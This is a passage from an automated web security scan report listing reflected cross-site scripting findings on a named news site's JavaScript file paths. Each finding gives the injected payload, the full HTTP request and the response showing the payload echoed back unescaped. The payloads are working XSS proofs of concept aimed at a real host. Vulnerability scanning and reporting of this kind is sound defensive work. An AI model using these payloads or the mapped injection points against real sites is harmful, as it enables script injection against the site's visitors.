Last-Modified: Mon, 19 Sep 2011 19:19:29 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316459969"
Content-Type: text/html; charset=utf-8
Content-Length: 57605
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:19:33 GMT
X-Varnish: 1959721346
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
s.prop13="CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sitesdc553"-alert(1)-"8bfb3a7cb5d/all/modules/contrib/ajax_poll_results/ajax_poll_results.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops!
...[SNIP]...

1.128. http://www.itworld.com/sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4491"><script>alert(1)</script>6d4f7c695a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitese4491"><script>alert(1)</script>6d4f7c695a5/all/modules/contrib/ajax_poll_results/ajax_poll_results.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:19:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316459949"
Content-Type: text/html; charset=utf-8
Content-Length: 57825
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:19:14 GMT
X-Varnish: 1959720902
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sitese4491"><script>alert(1)</script>6d4f7c695a5/all/modules/contrib/ajax_poll_results/ajax_poll_results.js?h"/>
...[SNIP]...

1.129. http://www.itworld.com/sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1f8b"-alert(1)-"d07feee0cf4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/alla1f8b"-alert(1)-"d07feee0cf4/modules/contrib/ajax_poll_results/ajax_poll_results.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:20:50 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460050"
Content-Type: text/html; charset=utf-8
Content-Length: 57606
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:20:55 GMT
X-Varnish: 1959723999
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
op13="CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/alla1f8b"-alert(1)-"d07feee0cf4/modules/contrib/ajax_poll_results/ajax_poll_results.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We c
...[SNIP]...

1.130. http://www.itworld.com/sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c90a2"><script>alert(1)</script>465275ca8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/allc90a2"><script>alert(1)</script>465275ca8f/modules/contrib/ajax_poll_results/ajax_poll_results.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:20:17 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460017"
Content-Type: text/html; charset=utf-8
Content-Length: 57814
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:20:36 GMT
X-Varnish: 1959722843
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/allc90a2"><script>alert(1)</script>465275ca8f/modules/contrib/ajax_poll_results/ajax_poll_results.js?h"/>
...[SNIP]...

1.131. http://www.itworld.com/sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56493"><script>alert(1)</script>0d0a766abc9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib56493"><script>alert(1)</script>0d0a766abc9/ajax_poll_results/ajax_poll_results.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:22:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460143"
Content-Type: text/html; charset=utf-8
Content-Length: 57825
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:22:42 GMT
X-Varnish: 252446223
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib56493"><script>alert(1)</script>0d0a766abc9/ajax_poll_results/ajax_poll_results.js?h"/>
...[SNIP]...

1.132. http://www.itworld.com/sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f996"-alert(1)-"a0cc3ad341c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib2f996"-alert(1)-"a0cc3ad341c/ajax_poll_results/ajax_poll_results.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:23:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460188"
Content-Type: text/html; charset=utf-8
Content-Length: 57612
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:23:41 GMT
X-Varnish: 252446940
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
op14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib2f996"-alert(1)-"a0cc3ad341c/ajax_poll_results/ajax_poll_results.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the
...[SNIP]...

1.133. http://www.itworld.com/sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 960ed"-alert(1)-"fccf2dd31b8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js960ed"-alert(1)-"fccf2dd31b8?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:25:52 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460352"
Content-Type: text/html; charset=utf-8
Content-Length: 57612
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:25:54 GMT
X-Varnish: 1038161285
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js960ed"-alert(1)-"fccf2dd31b8";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eVar13="CMS";

...[SNIP]...

1.134. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fd3d"-alert(1)-"36ba1e0eb12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all3fd3d"-alert(1)-"36ba1e0eb12/modules/contrib/cluetip/cluetip/jquery.cluetip.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:22:54 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460174"
Content-Type: text/html; charset=utf-8
Content-Length: 57560
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:22:58 GMT
X-Varnish: 252446808
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
op13="CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all3fd3d"-alert(1)-"36ba1e0eb12/modules/contrib/cluetip/cluetip/jquery.cluetip.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn
...[SNIP]...

1.135. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49e50"><script>alert(1)</script>fdbfd5089f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all49e50"><script>alert(1)</script>fdbfd5089f9/modules/contrib/cluetip/cluetip/jquery.cluetip.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:22:27 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460147"
Content-Type: text/html; charset=utf-8
Content-Length: 57780
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:22:38 GMT
X-Varnish: 252446304
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all49e50"><script>alert(1)</script>fdbfd5089f9/modules/contrib/cluetip/cluetip/jquery.cluetip.js?h"/>
...[SNIP]...

1.136. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2167b"-alert(1)-"0388867f9c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules2167b"-alert(1)-"0388867f9c9/contrib/cluetip/cluetip/jquery.cluetip.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:23:54 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460234"
Content-Type: text/html; charset=utf-8
Content-Length: 57566
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:23:57 GMT
X-Varnish: 252448216
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
S";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules2167b"-alert(1)-"0388867f9c9/contrib/cluetip/cluetip/jquery.cluetip.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find
...[SNIP]...

1.137. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae6af"><script>alert(1)</script>c139c3e795a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modulesae6af"><script>alert(1)</script>c139c3e795a/contrib/cluetip/cluetip/jquery.cluetip.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:23:34 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460214"
Content-Type: text/html; charset=utf-8
Content-Length: 57786
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:23:39 GMT
X-Varnish: 252447461
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modulesae6af"><script>alert(1)</script>c139c3e795a/contrib/cluetip/cluetip/jquery.cluetip.js?h"/>
...[SNIP]...

1.138. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84992"-alert(1)-"86280955db2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/cluetip84992"-alert(1)-"86280955db2/cluetip/jquery.cluetip.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:25:16 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460316"
Content-Type: text/html; charset=utf-8
Content-Length: 57566
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:25:25 GMT
X-Varnish: 1038160026
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
erich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/cluetip84992"-alert(1)-"86280955db2/cluetip/jquery.cluetip.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you req
...[SNIP]...

1.139. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71953"-alert(1)-"cd0a9f2e1f0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

